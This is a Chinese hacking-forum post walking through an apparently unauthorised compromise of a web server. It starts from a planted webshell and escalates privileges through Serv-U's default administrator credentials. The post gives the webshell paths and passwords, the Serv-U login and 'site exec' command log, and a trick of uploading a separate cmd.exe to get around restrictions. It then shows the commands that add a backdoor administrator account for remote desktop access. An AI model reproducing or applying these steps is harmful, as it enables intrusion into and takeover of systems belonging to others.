黑帽联盟

 找回密码
 会员注册
查看: 2550|回复: 0
打印 上一主题 下一主题

[系统安全] Serv-U提权实例测试演示

[复制链接]

295

主题

18

听众

965

积分

管理员

Rank: 9Rank: 9Rank: 9

  • TA的每日心情
    难过
    2024-11-13 00:16
  • 签到天数: 370 天

    [LV.9]以坛为家II

    Shell:http://www.案例/manage/Databackup/error.asp
    Pass:123321111
    如图:
    12.png

    看了一下服务器基本信息,得到以下信息:
    支持aspx,不支持php,Wscript.Shell不可用
    127.0.0.1:21.........关闭
    127.0.0.1:1433.........开放
    127.0.0.1:3389.........开放
    127.0.0.1:43958.........开放
    远程桌面可以连接

    磁盘目录限制不是很严格,C盘根目录都可以直接浏览,如图:
    13.png

    从上边得到的信息中可以发现,服务器开放1433端口,那么是开放了MSSQL服务的,如果这台服务器的MSSQL存在弱口令,我们也可以利用MSSQLl来提取,但是这里我测试过之后发现,这里的MSSQL不存在弱口令。
    服务器也开放了43958端口,这是Serv-U特定会开放的端口,看到这个端口,那就说明服务器上装了Serv-U软件,我们或许可以通过这一点来提权。
    对于Serv-U提权来说,aspx的脚本和php的脚本提权的成功率还是蛮高的,asp的提权脚本成功率很低,所以我这里就不用这个asp的web了,我再传一个aspx的shell上去,这个服务器是支持aspx的。
    上传完毕的aspx的web的地址是:
    http://www.案例/manage/Databackup/drvfan.aspx
    密码是:
    NI610B

    登陆后,直接切换到SU的提权界面:
    14.png
    15.png

    什么都不用改,直接单击“Exploit”按钮开始执行,回显如图:
    16.png
    17.png

    在回显中的这么几句:
    220 Serv-U FTP Server v6.3 for WinSock ready...
    user localadministrator
    331 User name okay, need password.
    pass #l@$ak#.lk;0@P
    230 User logged in, proceed.

    可以看到,SU的默认管理密码并没有被修改,我们登陆是成功了的,在后边的这么几句:
    220 Serv-U FTP Server v6.3 for WinSock ready...
    user bin
    331 User name okay, need password.
    pass binftp
    230 User logged in, proceed.
    site exec cmd.exe /c net user
    501 Cannot EXEC command line (error=0).
    Quit
    这里我们的FTP用户是添加成功了的,但是我们执行net user失败了,错误提示是:
    Cannot EXEC command line (error=0)
    对于这个错误,我觉得应该是因为服务器管理员对cmd.exe做了权限限制,导致我们的web无权调用cmd.exe,进而导致我们这里的命令执行失败。
    失败的原因找到了,那么解决办法也就有了。

    遇到这种情况,我们可以直接自己传一个cmd.exe上去的,一般我都会传到C:\windows\temp目录下,如图:
    18.png
    这个cmd.exe就是我传上去的。

    好了,现在回到SU提权界面,把我们传上去的cmd.exe的路径填上,如图:
    19.png

    其他的都不要动,然后再执行,如图:
    21.png

    看这两句:
    site exec c:\windows\temp\cmd.exe /c net user
    200 EXEC command successful (TID=33).
    可以看到,这次就提示执行成功了。
    然后我们把命令改成添加管理员的命令即可,比如这两句:
    net user drvfan drv283MLGB!!! /add
    net localgroup administrators drvfan /add

    如图:

    这样直接执行就OK了,执行完毕就在服务器上添加了一个用户名为drvfan,密码为drv283MLGB!!!的管理员,这里的服务器开了3389,直接连上去登陆就行了,如图:
    22.png
    完毕。

    帖子永久地址: 

    黑帽联盟 - 论坛版权1、本主题所有言论和图片纯属会员个人意见,与本论坛立场无关
    2、本站所有主题由该帖子作者发表,该帖子作者与黑帽联盟享有帖子相关版权
    3、其他单位或个人使用、转载或引用本文时必须同时征得该帖子作者和黑帽联盟的同意
    4、帖子作者须承担一切因本文发表而直接或间接导致的民事或刑事法律责任
    5、本帖部分内容转载自其它媒体,但并不代表本站赞同其观点和对其真实性负责
    6、如本帖侵犯到任何版权问题,请立即告知本站,本站将及时予与删除并致以最深的歉意
    7、黑帽联盟管理员和版主有权不事先通知发贴者而删除本文

    您需要登录后才可以回帖 登录 | 会员注册

    发布主题 !fastreply! 收藏帖子 返回列表 搜索
    回顶部